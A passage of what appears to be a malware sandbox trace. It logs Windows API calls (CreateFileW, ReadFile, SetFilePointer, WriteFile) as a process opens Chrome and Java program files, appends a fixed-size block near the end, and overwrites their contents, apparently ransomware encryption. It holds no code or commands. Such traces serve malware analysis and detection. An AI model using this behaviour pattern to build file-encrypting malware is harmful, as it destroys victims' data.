(in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7e47b [0128.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.251] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.251] ReleaseMutex (hMutex=0x168) returned 1 [0128.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ru.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ru.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ru.pak", lpUsedDefaultChar=0x0) returned 6 [0128.251] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0128.253] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7d47b [0128.253] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.255] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7d47b [0128.255] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.256] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0128.256] WriteFile (in: hFile=0x1dc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0128.256] CloseHandle (hObject=0x1dc) returned 1 [0128.257] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.258] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.258] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x9efb8 [0128.258] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.258] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.258] ReleaseMutex (hMutex=0x168) returned 1 [0128.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="th.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="th.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="th.pak", lpUsedDefaultChar=0x0) returned 6 [0128.259] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.744] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.761] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9dfb8 [0128.761] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.782] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9dfb8 [0128.783] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.785] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0128.785] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.785] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.786] CloseHandle (hObject=0x1dc) returned 1 [0128.786] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.787] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.788] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x118671c [0128.788] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.788] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.788] ReleaseMutex (hMutex=0x168) returned 1 [0128.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.pak", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.pak", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="resources.pak", lpUsedDefaultChar=0x0) returned 13 [0128.788] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.793] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.795] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.798] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.800] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.803] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.805] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.806] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef00000 [0128.819] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0130.569] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0130.570] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x2d5f23c, dwLength=0x1c | out: lpBuffer=0x2d5f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.570] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ed40000 [0130.571] Sleep (dwMilliseconds=0x0) [0130.817] VirtualFree (lpAddress=0x7ef00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.822] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x118471c [0130.822] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0131.460] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x118471c [0131.464] VirtualFree (lpAddress=0x7ed40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.465] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0131.466] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0131.466] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.466] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.466] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.467] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.467] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.468] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.468] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.469] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0131.469] WriteFile (in: hFile=0x1dc, lpBuffer=0x27ec5a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0131.470] CloseHandle (hObject=0x1dc) returned 1 [0131.470] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.471] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.471] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x57f [0131.472] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.472] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.472] ReleaseMutex (hMutex=0x168) returned 1 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="widevinecdmadapter.dll.sig", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="widevinecdmadapter.dll.sig", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="widevinecdmadapter.dll.sig", lpUsedDefaultChar=0x0) returned 26 [0131.472] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x57f, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x57f, lpOverlapped=0x0) returned 1 [0131.491] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0131.492] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xb07, lpOverlapped=0x0) returned 1 [0131.492] CloseHandle (hObject=0x1dc) returned 1 [0131.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.496] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.496] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x105a8 [0131.496] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.496] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.496] ReleaseMutex (hMutex=0x168) returned 1 [0131.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0131.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.exe", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javacpl.exe", lpUsedDefaultChar=0x0) returned 11 [0131.496] ReadFile (in: hFile=0x1dc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0131.521] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf5a8 [0131.522] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.569] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf5a8 [0131.570] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0131.570] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0131.570] WriteFile (in: hFile=0x1dc, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0131.570] CloseHandle (hObject=0x1dc) returned 1 [0131.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.573] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.573] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3da8 [0131.573] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.573] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.573] ReleaseMutex (hMutex=0x168) returned 1 [0131.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ktab.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ktab.exe", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ktab.exe", lpUsedDefaultChar=0x0) returned 8 [0131.574] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.576] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2da8 [0131.576] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.577] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2da8 [0131.577] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0131.578] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0131.578] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0131.578] CloseHandle (hObject=0x1dc) returned 1 [0131.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.581] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.581] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3fa8 [0131.581] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.581] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.582] ReleaseMutex (hMutex=0x168) returned 1 [0131.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tnameserv.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 